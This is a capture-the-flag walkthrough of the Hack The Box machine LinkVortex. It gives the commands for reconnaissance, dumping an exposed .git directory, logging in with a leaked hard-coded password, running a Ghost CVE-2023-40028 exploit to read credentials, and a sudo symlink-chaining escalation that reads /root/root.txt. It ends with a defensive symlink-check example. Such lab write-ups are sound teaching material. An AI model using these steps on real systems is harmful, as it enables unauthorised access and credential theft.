HTB Writeup LinkVortex

Vedant Yaduvanshi
5 min read · Dec 22, 2024


Hacking 101 : Hack The Box Writeup 01

LinkVortex is a Linux machine on HTB, and this is the write-up on how I hacked it. I encourage you to find the loopholes on your own first :)

I try to write one write-up (maybe two if I get time) every week here on Medium, and they also get pushed to my GitHub.

First things first, we will start with an Nmap scan to check for open ports.

nmap -sC -sV 10.129.194.62

From the result, we find two open ports.

To continue enumeration, we will first add the IP address and domain to our /etc/hosts file.

Check the technologies used to build this webpage by using the Wappalyzer extension.

(CMS: Ghost 5.58) Something to notice

Now, let’s perform a directory search to expand our attack surface.

We will use Dirsearch; however, one can also use Dirb or ffuf:

dirsearch -u linkvortex.htb -t 50 -i 200

Going through our findings, we found something useful in /robots.txt this time.

Upon visiting, we find a few endpoints marked as disallowed, which asks search engines not to crawl them.

While the other endpoints return a 404, we find a login page at /ghost.

But we don’t know any credentials to use here, so for now let’s look for subdomains.

We will use ffuf for this.

ffuf -u http://linkvortex.htb/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -H "Host: FUZZ.linkvortex.htb" -mc 200

We find a subdomain: dev.linkvortex.htb.

To visit it, add this one to /etc/hosts as well.

Upon visiting there is not much to see, so let’s run a directory search on it too:

dirsearch -u dev.linkvortex.htb -t 50 -i 200

The results show that there is a Git leak.

If the .git/ directory is publicly accessible, it's a sign of a potential Git leak.

To confirm it and obtain the whole leak, we will use GitHack.

Clone GitHack onto your machine from here.

python GitHack.py -u "http://dev.linkvortex.htb/.git/"

After the scan completes successfully, a new folder named “dev.linkvortex” is created, containing a JavaScript file “authentication.test.js” at this location:

/GitHack/dev.linkvortex.htb/ghost/core/test/regression/api/admin

Reviewing the JS file, you will find a hard-coded password in it:

const password = 'OctopiFociPilfer45'; // on line 55

Note: Also, line 4 in Dockerfile.ghost, which is ‘COPY config.production.json /var/lib/ghost/config.production.json,’ will be of special interest to us later on.

We can try logging in to the http://linkvortex.htb/ghost/ portal we found earlier with these credentials:

(Using admin@linkvortex.htb as the username is an educated guess, because the post on the blog page was made by the user admin.)

username : admin@linkvortex.htb
password: OctopiFociPilfer45

We are logged in successfully.

Now, if you remember from the Wappalyzer extension, we learned that the site is using Ghost v5.58.

After some Googling we find that Ghost v5.58 has several known vulnerabilities, one of them being CVE-2023-40028.

We can clone an exploit for it from here.

After cloning, make sure to change the URL on line 14 of CVE-2023-40028.sh to “http://linkvortex.htb/”.

Now we will run the exploit using the username and password we got earlier:

./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45

Now, if you remember the interesting finding from Dockerfile.ghost:

/var/lib/ghost/config.production.json

This is the file path where we will find the SSH username and password, so read this path from the shell the exploit gives us.

We get a username and password:

username: bob@linkvortex.htb
password: fibber-talented-worth

Now let’s SSH into the machine:

We are in; now just cat user.txt to get the user flag 🥰.

Now, to get the root flag, we have to escalate our privileges.

First, let’s check Bob’s sudo permissions with sudo -l.

Bob is not a high-privileged user, but he can still execute these commands as root. So, let’s first see what is actually inside that script:

Open it by:

cat /opt/ghost/clean_symlink.sh

So, now let’s understand how we can exploit this:

First we will create a symlink xyz.txt that points to the root flag, root.txt:

ln -s /root/root.txt xyz.txt

Now we will create a second symlink, xyz.png, pointing to xyz.txt. So when xyz.png is opened, it ultimately resolves to /root/root.txt.

ln -s /home/bob/xyz.txt xyz.png

Finally, we run the script as root:

sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/xyz.png

The script thinks xyz.png is a normal image file and moves it to a special folder. Since CHECK_CONTENT=true, the script then prints the contents of xyz.png, which is actually root.txt! 😉
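From a defender's view, the flaw is that the script judges a symlink by its first hop only. The following is an added example, not the machine's clean_symlink.sh (whose contents the write-up does not show): naive_check is a hypothetical stand-in for a one-hop check, and safe_check resolves the whole chain with GNU readlink -f and accepts only files under an allowed directory.

```shell
# Added example, not the machine's clean_symlink.sh. Assumes GNU readlink -f.

# naive_check: hypothetical one-hop check that inspects only the immediate
# target (readlink without -f). It accepts anything whose first hop ends in
# ".txt", so a chained link slips through.
naive_check() {
    local target
    target=$(readlink "$1") || return 1
    case "$target" in
        *.txt) return 0 ;;
        *)     return 1 ;;
    esac
}

# safe_check LINK ALLOWED_DIR: canonicalise every hop and accept only when the
# final real file lives under ALLOWED_DIR (also canonicalised).
safe_check() {
    local real allowed
    allowed=$(readlink -f "$2") || return 1
    real=$(readlink -f "$1") || return 1
    case "$real" in
        "$allowed"/*) return 0 ;;
        *)            return 1 ;;
    esac
}

# demo: constructed two-hop chain in a temp dir, mirroring the write-up's
# layout (home/bob/xyz.png -> home/bob/xyz.txt -> root/root.txt).
demo() {
    local tmp naive safe
    tmp=$(mktemp -d)
    mkdir -p "$tmp/home/bob" "$tmp/root"
    echo "constructed flag" > "$tmp/root/root.txt"
    ln -s "$tmp/root/root.txt" "$tmp/home/bob/xyz.txt"
    ln -s "$tmp/home/bob/xyz.txt" "$tmp/home/bob/xyz.png"
    if naive_check "$tmp/home/bob/xyz.png"; then naive=accepted; else naive=rejected; fi
    if safe_check "$tmp/home/bob/xyz.png" "$tmp/home/bob"; then safe=accepted; else safe=rejected; fi
    rm -rf "$tmp"
    echo "naive: $naive, hardened: $safe"
}
```

Running demo shows the one-hop check accepting the chained link while the canonicalising check rejects it.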

Congrats, have a good day ahead, hacker.
